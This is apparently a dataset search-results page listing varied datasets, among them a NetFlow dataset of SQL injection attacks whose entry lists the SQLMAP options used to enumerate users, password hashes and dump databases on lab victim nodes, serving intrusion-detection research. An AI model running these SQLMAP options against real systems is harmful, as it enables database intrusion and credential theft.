100+ datasets found
  1. Amount of data created, consumed, and stored 2010-2023, with forecasts to...

    • statista.com
    Updated Jun 30, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Statista (2025). Amount of data created, consumed, and stored 2010-2023, with forecasts to 2028 [Dataset]. https://www.statista.com/statistics/871513/worldwide-data-created/
    Explore at:
    Dataset updated
    Jun 30, 2025
    Dataset authored and provided by
    Statistahttp://statista.com/
    Time period covered
    May 2024
    Area covered
    Worldwide
    Description

    The total amount of data created, captured, copied, and consumed globally is forecast to increase rapidly, reaching *** zettabytes in 2024. Over the next five years up to 2028, global data creation is projected to grow to more than *** zettabytes. In 2020, the amount of data created and replicated reached a new high. The growth was higher than previously expected, caused by the increased demand due to the COVID-19 pandemic, as more people worked and learned from home and used home entertainment options more often. Storage capacity also growing Only a small percentage of this newly created data is kept though, as just * percent of the data produced and consumed in 2020 was saved and retained into 2021. In line with the strong growth of the data volume, the installed base of storage capacity is forecast to increase, growing at a compound annual growth rate of **** percent over the forecast period from 2020 to 2025. In 2020, the installed base of storage capacity reached *** zettabytes.

  2. d

    Tutorial: How to use Google Data Studio and ArcGIS Online to create an...

    • search.dataone.org
    • hydroshare.org
    • +1more
    Updated Apr 15, 2022
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Sarah Beganskas (2022). Tutorial: How to use Google Data Studio and ArcGIS Online to create an interactive data portal [Dataset]. http://doi.org/10.4211/hs.9edae0ef99224e0b85303c6d45797d56
    Explore at:
    Dataset updated
    Apr 15, 2022
    Dataset provided by
    Hydroshare
    Authors
    Sarah Beganskas
    Description

    This tutorial will teach you how to take time-series data from many field sites and create a shareable online map, where clicking on a field location brings you to a page with interactive graph(s).

    The tutorial can be completed with a sample dataset (provided via a Google Drive link within the document) or with your own time-series data from multiple field sites.

    Part 1 covers how to make interactive graphs in Google Data Studio and Part 2 covers how to link data pages to an interactive map with ArcGIS Online. The tutorial will take 1-2 hours to complete.

    An example interactive map and data portal can be found at: https://temple.maps.arcgis.com/apps/View/index.html?appid=a259e4ec88c94ddfbf3528dc8a5d77e8

  3. Company Datasets for Business Profiling

    • datarade.ai
    Updated Feb 23, 2017
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Oxylabs (2017). Company Datasets for Business Profiling [Dataset]. https://datarade.ai/data-products/company-datasets-for-business-profiling-oxylabs
    Explore at:
    .json, .xml, .csv, .xlsAvailable download formats
    Dataset updated
    Feb 23, 2017
    Dataset authored and provided by
    Oxylabs
    Area covered
    Canada, Moldova (Republic of), Isle of Man, British Indian Ocean Territory, Andorra, Nepal, Taiwan, Northern Mariana Islands, Tunisia, Bangladesh
    Description

    Company Datasets for valuable business insights!

    Discover new business prospects, identify investment opportunities, track competitor performance, and streamline your sales efforts with comprehensive Company Datasets.

    These datasets are sourced from top industry providers, ensuring you have access to high-quality information:

    • Owler: Gain valuable business insights and competitive intelligence. -AngelList: Receive fresh startup data transformed into actionable insights. -CrunchBase: Access clean, parsed, and ready-to-use business data from private and public companies. -Craft.co: Make data-informed business decisions with Craft.co's company datasets. -Product Hunt: Harness the Product Hunt dataset, a leader in curating the best new products.

    We provide fresh and ready-to-use company data, eliminating the need for complex scraping and parsing. Our data includes crucial details such as:

    • Company name;
    • Size;
    • Founding date;
    • Location;
    • Industry;
    • Revenue;
    • Employee count;
    • Competitors.

    You can choose your preferred data delivery method, including various storage options, delivery frequency, and input/output formats.

    Receive datasets in CSV, JSON, and other formats, with storage options like AWS S3 and Google Cloud Storage. Opt for one-time, monthly, quarterly, or bi-annual data delivery.

    With Oxylabs Datasets, you can count on:

    • Fresh and accurate data collected and parsed by our expert web scraping team.
    • Time and resource savings, allowing you to focus on data analysis and achieving your business goals.
    • A customized approach tailored to your specific business needs.
    • Legal compliance in line with GDPR and CCPA standards, thanks to our membership in the Ethical Web Data Collection Initiative.

    Pricing Options:

    Standard Datasets: choose from various ready-to-use datasets with standardized data schemas, priced from $1,000/month.

    Custom Datasets: Tailor datasets from any public web domain to your unique business needs. Contact our sales team for custom pricing.

    Experience a seamless journey with Oxylabs:

    • Understanding your data needs: We work closely to understand your business nature and daily operations, defining your unique data requirements.
    • Developing a customized solution: Our experts create a custom framework to extract public data using our in-house web scraping infrastructure.
    • Delivering data sample: We provide a sample for your feedback on data quality and the entire delivery process.
    • Continuous data delivery: We continuously collect public data and deliver custom datasets per the agreed frequency.

    Unlock the power of data with Oxylabs' Company Datasets and supercharge your business insights today!

  4. Z

    Data from: SQL Injection Attack Netflow

    • data.niaid.nih.gov
    • portalcienciaytecnologia.jcyl.es
    • +2more
    Updated Sep 28, 2022
    + more versions
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Adrián Campazas (2022). SQL Injection Attack Netflow [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_6907251
    Explore at:
    Dataset updated
    Sep 28, 2022
    Dataset provided by
    Ignacio Crespo
    Adrián Campazas
    License

    Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    Introduction

    This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used.

    NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.

    Datasets

    The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2).

    The datasets contain both benign and malicious traffic. All collected datasets are balanced.

    The version of NetFlow used to build the datasets is 5.

        Dataset
        Aim
        Samples
        Benign-malicious
        traffic ratio
    
    
    
    
        D1
        Training
        400,003
        50%
    
    
        D2
        Test
        57,239
        50%
    

    Infrastructure and implementation

    Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows.

    DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes)

    Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet).

    The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities.

    The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table.

        Parameters
        Description
    
    
    
    
        '--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema'
        Enumerate users, password hashes, privileges, roles, databases, tables and columns
    
    
        --level=5
        Increase the probability of a false positive identification
    
    
        --risk=3
        Increase the probability of extracting data
    
    
        --random-agent
        Select the User-Agent randomly
    
    
        --batch
        Never ask for user input, use the default behavior
    
    
        --answers="follow=Y"
        Predefined answers to yes
    

    Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer).

    The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.

    However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes.

    To run the MySQL server we ran MariaDB version 10.4.12. Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.

  5. P

    SynthPAI Dataset

    • paperswithcode.com
    Updated Jun 10, 2024
    + more versions
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Hanna Yukhymenko; Robin Staab; Mark Vero; Martin Vechev (2024). SynthPAI Dataset [Dataset]. https://paperswithcode.com/dataset/synthpai
    Explore at:
    Dataset updated
    Jun 10, 2024
    Authors
    Hanna Yukhymenko; Robin Staab; Mark Vero; Martin Vechev
    Description

    SynthPAI was created to provide a dataset that can be used to investigate the personal attribute inference (PAI) capabilities of LLM on online texts. Due to associated privacy concerns with real-world data, open datasets are rare (non-existent) in the research community. SynthPAI is a synthetic dataset that aims to fill this gap.

    Dataset Details Dataset Description SynthPAI was created using 300 GPT-4 agents seeded with individual personalities interacting with each other in a simulated online forum and consists of 103 threads and 7823 comments. For each profile, we further provide a set of personal attributes that a human could infer from the profile. We additionally conducted a user study to evaluate the quality of the synthetic comments, establishing that humans can barely distinguish between real and synthetic comments.

    Curated by: The dataset was created by SRILab at ETH Zurich. It was not created on behalf of any outside entity. Funded by: Two authors of this work are supported by the Swiss State Secretariat for Education, Research and Innovation (SERI) (SERI-funded ERC Consolidator Grant). This project did, however, not receive explicit funding by SERI and was devised independently. Views and opinions expressed are however those of the authors only and do not necessarily reflect those of the SERI-funded ERC Consolidator Grant. Shared by: SRILab at ETH Zurich Language(s) (NLP): English License: CC-BY-NC-SA-4.0

    Dataset Sources

    Repository: https://github.com/eth-sri/SynthPAI Paper: https://arxiv.org/abs/2406.07217

    Uses The dataset is intended to be used as a privacy-preserving method of (i) evaluating PAI capabilities of language models and (ii) aiding the development of potential defenses against such automated inferences.

    Direct Use As in the associated paper , where we include an analysis of the personal attribute inference (PAI) capabilities of 18 state-of-the-art LLMs across different attributes and on anonymized texts.

    Out-of-Scope Use The dataset shall not be used as part of any system that performs attribute inferences on real natural persons without their consent or otherwise maliciously.

    Dataset Structure We provide the instance descriptions below. Each data point consists of a single comment (that can be a top-level post):

    Comment

    author str: unique identifier of the person writing

    username str: corresponding username

    parent_id str: unique identifier of the parent comment

    thread_id str: unique identifier of the thread

    children list[str]: unique identifiers of children comments

    profile Profile: profile making the comment - described below

    text str: text of the comment

    guesses list[dict]: Dict containing model estimates of attributes based on the comment. Only contains attributes for which a prediction exists.

    reviews dict: Dict containing human estimates of attributes based on the comment. Each guess contains a corresponding hardness rating (and certainty rating). Contains all attributes

    The associated profiles are structured as follows

    Profile

    username str: identifier

    attributes: set of personal attributes that describe the user (directly listed below)

    The corresponding attributes and values are

    Attributes

    Age continuous [18-99] The age of a user in years.

    Place of Birth tuple [city, country] The place of birth of a user. We create tuples jointly for city and country in free-text format. (field name: birth_city_country)

    Location tuple [city, country] The current location of a user. We create tuples jointly for city and country in free-text format. (field name: city_country)

    Education free-text We use a free-text field to describe the user's education level. This includes additional details such as the degree and major. To ensure comparability with the evaluation of prior work, we later map these to a categorical scale: high school, college degree, master's degree, PhD.

    Income Level free-text [low, medium, high, very high] The income level of a user. We first generate a continuous income level in the profile's local currency. In our code, we map this to a categorical value considering the distribution of income levels in the respective profile location. For this, we roughly follow the local equivalents of the following reference levels for the US: Low (<30k USD), Middle (30-60k USD), High (60-150k USD), Very High (>150k USD).

    Occupation free-text The occupation of a user, described as a free-text field.

    Relationship Status categorical [single, In a Relationship, married, divorced, widowed] The relationship status of a user as one of 5 categories.

    Sex categorical [Male, Female] Biological Sex of a profile.

    Dataset Creation Curation Rationale SynthPAI was created to provide a dataset that can be used to investigate the personal attribute inference (PAI) capabilities of LLM on online texts. Due to associated privacy concerns with real-world data, open datasets are rare (non-existent) in the research community. SynthPAI is a synthetic dataset that aims to fill this gap. We additionally conducted a user study to evaluate the quality of the synthetic comments, establishing that humans can barely distinguish between real and synthetic comments.

    Source Data The dataset is fully synthetic and was created using GPT-4 agents (version gpt-4-1106-preview) seeded with individual personalities interacting with each other in a simulated online forum.

    Data Collection and Processing The dataset was created by sampling comments from the agents in threads. A human then inferred a set of personal attributes from sets of comments associated with each profile. Further, it was manually reviewed to remove any offensive or inappropriate content. We give a detailed overview of our dataset-creation procedure in the corresponding paper.

    Annotations

    Annotations are provided by authors of the paper.

    Personal and Sensitive Information

    All contained personal information is purely synthetic and does not relate to any real individual.

    Bias, Risks, and Limitations All profiles are synthetic and do not correspond to any real subpopulations. We provide a distribution of the personal attributes of the profiles in the accompanying paper. As the dataset has been created synthetically, data points can inherit limitations (e.g., biases) from the underlying model, GPT-4. While we manually reviewed comments individually, we cannot provide respective guarantees.

    Citation BibTeX:

    @misc{2406.07217, Author = {Hanna Yukhymenko and Robin Staab and Mark Vero and Martin Vechev}, Title = {A Synthetic Dataset for Personal Attribute Inference}, Year = {2024}, Eprint = {arXiv:2406.07217}, } APA:

    Hanna Yukhymenko, Robin Staab, Mark Vero, Martin Vechev: “A Synthetic Dataset for Personal Attribute Inference”, 2024; arXiv:2406.07217.

    Dataset Card Authors

    Hanna Yukhymenko Robin Staab Mark Vero

  6. d

    Louisville Metro KY - Annual Open Data Report 2022

    • catalog.data.gov
    • data.louisvilleky.gov
    • +1more
    Updated Apr 13, 2023
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Louisville/Jefferson County Information Consortium (2023). Louisville Metro KY - Annual Open Data Report 2022 [Dataset]. https://catalog.data.gov/dataset/louisville-metro-ky-annual-open-data-report-2022
    Explore at:
    Dataset updated
    Apr 13, 2023
    Dataset provided by
    Louisville/Jefferson County Information Consortium
    Area covered
    Kentucky, Louisville
    Description

    On August 25th, 2022, Metro Council Passed Open Data Ordinance; previously open data reports were published on Mayor Fischer's Executive Order, You can find here both the Open Data Ordinance, 2022 (PDF) and the Mayor's Open Data Executive Order, 2013 Open Data Annual ReportsPage 6 of the Open Data Ordinance, Within one year of the effective date of this Ordinance, and thereafter no later than September1 of each year, the Open Data Management Team shall submit to the Mayor and Metro Council an annual Open Data Report.The Open Data Management team (also known as the Data Governance Team is currently led by the city's Data Officer Andrew McKinney in the Office of Civic Innovation and Technology. Previously, it was led by the former Data Officer, Michael Schnuerle and prior to that by Director of IT.Open Data Ordinance O-243-22 TextLouisville Metro GovernmentLegislation TextFile #: O-243-22, Version: 3ORDINANCE NO._, SERIES 2022AN ORDINANCE CREATING A NEW CHAPTER OF THE LOUISVILLE/JEFFERSONCOUNTY METRO CODE OF ORDINANCES CREATING AN OPEN DATA POLICYAND REVIEW. (AMENDMENT BY SUBSTITUTION)(AS AMENDED).SPONSORED BY: COUNCIL MEMBERS ARTHUR, WINKLER, CHAMBERS ARMSTRONG,PIAGENTINI, DORSEY, AND PRESIDENT JAMESWHEREAS, Metro Government is the catalyst for creating a world-class city that provides itscitizens with safe and vibrant neighborhoods, great jobs, a strong system of education and innovationand a high quality of life;WHEREAS, it should be easy to do business with Metro Government. Online governmentinteractions mean more convenient services for citizens and businesses and online governmentinteractions improve the cost effectiveness and accuracy of government operations;WHEREAS, an open government also makes certain that every aspect of the builtenvironment also has reliable digital descriptions available to citizens and entrepreneurs for deepengagement mediated by smart devices;WHEREAS, every citizen has the right to prompt, efficient service from Metro Government;WHEREAS, the adoption of open standards improves transparency, access to publicinformation and improved coordination and efficiencies among Departments and partnerorganizations across the public, non-profit and private sectors;WHEREAS, by publishing structured standardized data in machine readable formats, MetroGovernment seeks to encourage the local technology community to develop software applicationsand tools to display, organize, analyze, and share public record data in new and innovative ways;WHEREAS, Metro Government’s ability to review data and datasets will facilitate a betterUnderstanding of the obstacles the city faces with regard to equity;WHEREAS, Metro Government’s understanding of inequities, through data and datasets, willassist in creating better policies to tackle inequities in the city;WHEREAS, through this Ordinance, Metro Government desires to maintain its continuousimprovement in open data and transparency that it initiated via Mayoral Executive Order No. 1,Series 2013;WHEREAS, Metro Government’s open data work has repeatedly been recognized asevidenced by its achieving What Works Cities Silver (2018), Gold (2019), and Platinum (2020)certifications. What Works Cities recognizes and celebrates local governments for their exceptionaluse of data to inform policy and funding decisions, improve services, create operational efficiencies,and engage residents. The Certification program assesses cities on their data-driven decisionmakingpractices, such as whether they are using data to set goals and track progress, allocatefunding, evaluate the effectiveness of programs, and achieve desired outcomes. These datainformedstrategies enable Certified Cities to be more resilient, respond in crisis situations, increaseeconomic mobility, protect public health, and increase resident satisfaction; andWHEREAS, in commitment to the spirit of Open Government, Metro Government will considerpublic information to be open by default and will proactively publish data and data containinginformation, consistent with the Kentucky Open Meetings and Open Records Act.NOW, THEREFORE, BE IT ORDAINED BY THE COUNCIL OF THELOUISVILLE/JEFFERSON COUNTY METRO GOVERNMENT AS FOLLOWS:SECTION I: A new chapter of the Louisville Metro Code of Ordinances (“LMCO”) mandatingan Open Data Policy and review process is hereby created as follows:§ XXX.01 DEFINITIONS. For the purpose of this Chapter, the following definitions shall apply unlessthe context clearly indicates or requires a different meaning.OPEN DATA. Any public record as defined by the Kentucky Open Records Act, which could bemade available online using Open Format data, as well as best practice Open Data structures andformats when possible, that is not Protected Information or Sensitive Information, with no legalrestrictions on use or reuse. Open Data is not information that is treated as exempt under KRS61.878 by Metro Government.OPEN DATA REPORT. The annual report of the Open Data Management Team, which shall (i)summarize and comment on the state of Open Data availability in Metro Government Departmentsfrom the previous year, including, but not limited to, the progress toward achieving the goals of MetroGovernment’s Open Data portal, an assessment of the current scope of compliance, a list of datasetscurrently available on the Open Data portal and a description and publication timeline for datasetsenvisioned to be published on the portal in the following year; and (ii) provide a plan for the next yearto improve online public access to Open Data and maintain data quality.OPEN DATA MANAGEMENT TEAM. A group consisting of representatives from each Departmentwithin Metro Government and chaired by the Data Officer who is responsible for coordinatingimplementation of an Open Data Policy and creating the Open Data Report.DATA COORDINATORS. The members of an Open Data Management Team facilitated by theData Officer and the Office of Civic Innovation and Technology.DEPARTMENT. Any Metro Government department, office, administrative unit, commission, board,advisory committee, or other division of Metro Government.DATA OFFICER. The staff person designated by the city to coordinate and implement the city’sopen data program and policy.DATA. The statistical, factual, quantitative or qualitative information that is maintained or created byor on behalf of Metro Government.DATASET. A named collection of related records, with the collection containing data organized orformatted in a specific or prescribed way.METADATA. Contextual information that makes the Open Data easier to understand and use.OPEN DATA PORTAL. The internet site established and maintained by or on behalf of MetroGovernment located at https://data.louisvilleky.gov/ or its successor website.OPEN FORMAT. Any widely accepted, nonproprietary, searchable, platform-independent, machinereadablemethod for formatting data which permits automated processes.PROTECTED INFORMATION. Any Dataset or portion thereof to which the Department may denyaccess pursuant to any law, rule or regulation.SENSITIVE INFORMATION. Any Data which, if published on the Open Data Portal, could raiseprivacy, confidentiality or security concerns or have the potential to jeopardize public health, safety orwelfare to an extent that is greater than the potential public benefit of publishing that data.§ XXX.02 OPEN DATA PORTAL(A) The Open Data Portal shall serve as the authoritative source for Open Data provided by MetroGovernment.(B) Any Open Data made accessible on Metro Government’s Open Data Portal shall use an OpenFormat.(C) In the event a successor website is used, the Data Officer shall notify the Metro Council andshall provide notice to the public on the main city website.§ XXX.03 OPEN DATA MANAGEMENT TEAM(A) The Data Officer of Metro Government will work with the head of each Department to identify aData Coordinator in each Department. The Open Data Management Team will work to establish arobust, nationally recognized, platform that addresses digital infrastructure and Open Data.(B) The Open Data Management Team will develop an Open Data Policy that will adopt prevailingOpen Format standards for Open Data and develop agreements with regional partners to publish andmaintain Open Data that is open and freely available while respecting exemptions allowed by theKentucky Open Records Act or other federal or state law.§ XXX.04 DEPARTMENT OPEN DATA CATALOGUE(A) Each Department shall retain ownership over the Datasets they submit to the Open DataPortal. The Departments shall also be responsible for all aspects of the quality, integrity and securityPortal. The Departments shall also be responsible for all aspects of the quality, integrity and securityof the Dataset contents, including updating its Data and associated Metadata.(B) Each Department shall be responsible for creating an Open Data catalogue which shall includecomprehensive inventories of information possessed and/or managed by the Department.(C) Each Department’s Open Data catalogue will classify information holdings as currently “public”or “not yet public;” Departments will work with the Office of Civic Innovation and Technology todevelop strategies and timelines for publishing Open Data containing information in a way that iscomplete, reliable and has a high level of detail.§ XXX.05 OPEN DATA REPORT AND POLICY REVIEW(A) Within one year of the effective date of this Ordinance, and thereafter no later than September1 of each year, the Open Data Management Team shall submit to the Mayor and Metro Council anannual Open Data Report.(B) Metro Council may request a specific Department to report on any data or dataset that may bebeneficial or pertinent in implementing policy and legislation.(C) In acknowledgment that technology changes rapidly, in the future, the Open Data Policy shouldshall be reviewed annually and considered for revisions or additions that will continue to positionMetro Government as a leader on issues of

  7. f

    Mozello | Web Hosting & Domain Names | Technology Data

    • datastore.forage.ai
    Updated Sep 22, 2024
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    (2024). Mozello | Web Hosting & Domain Names | Technology Data [Dataset]. https://datastore.forage.ai/searchresults/?resource_keyword=web
    Explore at:
    Dataset updated
    Sep 22, 2024
    Description

    Mozello, a SIA, is an innovative website builder that empowers individuals and businesses to create their own unique, modern websites and online stores. With Mozello, users can choose from a range of professionally designed templates and customize their website's layout, colors, and content to fit their brand's identity. The platform offers a user-friendly interface, making it easy for anyone to build and manage their own website without requiring extensive technical skills. Mozello's solutions cater to a diverse range of customers, from entrepreneurs and bloggers to activists and businesses of all sizes.

    Mozello's website builder is built for speed and ease, allowing users to create a website within a day. The platform's features are designed to help users succeed, including responsive design, powerful marketing and SEO tools, and a worry-free domain registration and web hosting solution. With Mozello, users can focus on what matters most - growing their business and online presence. The platform's customer support team is always available to help users overcome any challenges they may face, ensuring they can achieve their goals with ease. By choosing Mozello, users can rest assured that their online presence is in capable and reliable hands.

  8. f

    Data from: Creating predictive clothing size models for online customers

    • tandf.figshare.com
    docx
    Updated May 31, 2023
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Allison Davidson; Ellen Gundlach (2023). Creating predictive clothing size models for online customers [Dataset]. http://doi.org/10.6084/m9.figshare.19330468.v1
    Explore at:
    docxAvailable download formats
    Dataset updated
    May 31, 2023
    Dataset provided by
    Taylor & Francis
    Authors
    Allison Davidson; Ellen Gundlach
    License

    Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    A disadvantage to online clothes shopping is the inability to try on clothing to test the fit. A class project is discussed where students consult with the CEO of an online mensware clothing company to explore ways in which an online clothing customer can be assured of a superior fit by developing statistical models based on a shopper’s height and weight to predict measurements needed to create a suit that feels custom-made. The dataset is most amenable to use with students who have previously been exposed to simple linear regression, and can be used to explore multiple regression topics such as interaction terms, influential points, transformations, and polynomial predictors. Discussion points are included for more advanced topics such as canonical correlation, clustering, and dimension reduction.

  9. Data from: Synthetic time series data generation for edge analytics

    • zenodo.org
    bin
    Updated Nov 25, 2021
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Subarmaniam Kannan; Subarmaniam Kannan (2021). Synthetic time series data generation for edge analytics [Dataset]. http://doi.org/10.5281/zenodo.5673806
    Explore at:
    binAvailable download formats
    Dataset updated
    Nov 25, 2021
    Dataset provided by
    Zenodohttp://zenodo.org/
    Authors
    Subarmaniam Kannan; Subarmaniam Kannan
    License

    Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    In this research, we create synthetic data with features that are like data from IoT devices. We use an existing air quality dataset that includes temperature and gas sensor measurements. This real-time dataset includes component values for the Air Quality Index (AQI) and ppm concentrations for various polluting gas concentrations. We build a JavaScript Object Notation (JSON) model to capture the distribution of variables and structure of this real dataset to generate the synthetic data. Based on the synthetic dataset and original dataset, we create a comparative predictive model. Analysis of synthetic dataset predictive model shows that it can be successfully used for edge analytics purposes, replacing real-world datasets. There is no significant difference between the real-world dataset compared the synthetic dataset. The generated synthetic data requires no modification to suit the edge computing requirements. The framework can generate correct synthetic datasets based on JSON schema attributes. The accuracy, precision, and recall values for the real and synthetic datasets indicate that the logistic regression model is capable of successfully classifying data

  10. Data from: Current and projected research data storage needs of Agricultural...

    • catalog.data.gov
    • agdatacommons.nal.usda.gov
    • +2more
    Updated Apr 21, 2025
    + more versions
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Agricultural Research Service (2025). Current and projected research data storage needs of Agricultural Research Service researchers in 2016 [Dataset]. https://catalog.data.gov/dataset/current-and-projected-research-data-storage-needs-of-agricultural-research-service-researc-f33da
    Explore at:
    Dataset updated
    Apr 21, 2025
    Dataset provided by
    Agricultural Research Servicehttps://www.ars.usda.gov/
    Description

    The USDA Agricultural Research Service (ARS) recently established SCINet , which consists of a shared high performance computing resource, Ceres, and the dedicated high-speed Internet2 network used to access Ceres. Current and potential SCINet users are using and generating very large datasets so SCINet needs to be provisioned with adequate data storage for their active computing. It is not designed to hold data beyond active research phases. At the same time, the National Agricultural Library has been developing the Ag Data Commons, a research data catalog and repository designed for public data release and professional data curation. Ag Data Commons needs to anticipate the size and nature of data it will be tasked with handling. The ARS Web-enabled Databases Working Group, organized under the SCINet initiative, conducted a study to establish baseline data storage needs and practices, and to make projections that could inform future infrastructure design, purchases, and policies. The SCINet Web-enabled Databases Working Group helped develop the survey which is the basis for an internal report. While the report was for internal use, the survey and resulting data may be generally useful and are being released publicly. From October 24 to November 8, 2016 we administered a 17-question survey (Appendix A) by emailing a Survey Monkey link to all ARS Research Leaders, intending to cover data storage needs of all 1,675 SY (Category 1 and Category 4) scientists. We designed the survey to accommodate either individual researcher responses or group responses. Research Leaders could decide, based on their unit's practices or their management preferences, whether to delegate response to a data management expert in their unit, to all members of their unit, or to themselves collate responses from their unit before reporting in the survey. Larger storage ranges cover vastly different amounts of data so the implications here could be significant depending on whether the true amount is at the lower or higher end of the range. Therefore, we requested more detail from "Big Data users," those 47 respondents who indicated they had more than 10 to 100 TB or over 100 TB total current data (Q5). All other respondents are called "Small Data users." Because not all of these follow-up requests were successful, we used actual follow-up responses to estimate likely responses for those who did not respond. We defined active data as data that would be used within the next six months. All other data would be considered inactive, or archival. To calculate per person storage needs we used the high end of the reported range divided by 1 for an individual response, or by G, the number of individuals in a group response. For Big Data users we used the actual reported values or estimated likely values. Resources in this dataset:Resource Title: Appendix A: ARS data storage survey questions. File Name: Appendix A.pdfResource Description: The full list of questions asked with the possible responses. The survey was not administered using this PDF but the PDF was generated directly from the administered survey using the Print option under Design Survey. Asterisked questions were required. A list of Research Units and their associated codes was provided in a drop down not shown here. Resource Software Recommended: Adobe Acrobat,url: https://get.adobe.com/reader/ Resource Title: CSV of Responses from ARS Researcher Data Storage Survey. File Name: Machine-readable survey response data.csvResource Description: CSV file includes raw responses from the administered survey, as downloaded unfiltered from Survey Monkey, including incomplete responses. Also includes additional classification and calculations to support analysis. Individual email addresses and IP addresses have been removed. This information is that same data as in the Excel spreadsheet (also provided).Resource Title: Responses from ARS Researcher Data Storage Survey. File Name: Data Storage Survey Data for public release.xlsxResource Description: MS Excel worksheet that Includes raw responses from the administered survey, as downloaded unfiltered from Survey Monkey, including incomplete responses. Also includes additional classification and calculations to support analysis. Individual email addresses and IP addresses have been removed.Resource Software Recommended: Microsoft Excel,url: https://products.office.com/en-us/excel

  11. The Big Bang Theory dataset

    • kaggle.com
    Updated Mar 18, 2020
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    shilpibhattacharyya (2020). The Big Bang Theory dataset [Dataset]. https://www.kaggle.com/datasets/shilpibhattacharyya/the-big-bang-theory-dataset
    Explore at:
    CroissantCroissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
    Dataset updated
    Mar 18, 2020
    Dataset provided by
    Kagglehttp://kaggle.com/
    Authors
    shilpibhattacharyya
    Description

    Context

    There's a story behind every dataset and here's your opportunity to share yours.

    Content

    What's inside is more than just rows and columns. Make it easy for others to get started by describing how you acquired the data and what time period it represents, too. Dataset created from online transcripts of this sitcom

    Acknowledgements

    We wouldn't be here without the help of others. If you owe any attributions or thanks, include them here along with any citations of past research.

    Inspiration

    Your data will be in front of the world's largest data science community. What questions do you want to see answered?

  12. d

    Real estate data scraping - get property data from any website on the...

    • datarade.ai
    Updated Apr 17, 2023
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    ScrapeLabs (2023). Real estate data scraping - get property data from any website on the Internet | scrapelabs.io [Dataset]. https://datarade.ai/data-products/real-estate-data-scraping-get-property-data-from-any-websit-scrapelabs
    Explore at:
    .bin, .json, .xml, .csv, .xls, .sql, .txtAvailable download formats
    Dataset updated
    Apr 17, 2023
    Dataset authored and provided by
    ScrapeLabs
    Area covered
    Korea (Democratic People's Republic of), Guinea-Bissau, Guadeloupe, Saint Vincent and the Grenadines, Romania, Hong Kong, French Polynesia, Morocco, Puerto Rico, Canada
    Description

    We create tailor-made solutions for every customer, so there are no limits to how we can customize your scraper. You don't have to worry about buying and maintaining complex and expensive software, or hiring developers.

    You can get the data on a one-time or recurring (based on your needs) basis.

    Get the data in any format and to any destination you need: Excel, CSV, JSON, XML, S3, GCP, or any other.

  13. Z

    Dataset Artifact for paper "Root Cause Analysis for Microservice System...

    • data.niaid.nih.gov
    • zenodo.org
    Updated Aug 25, 2024
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
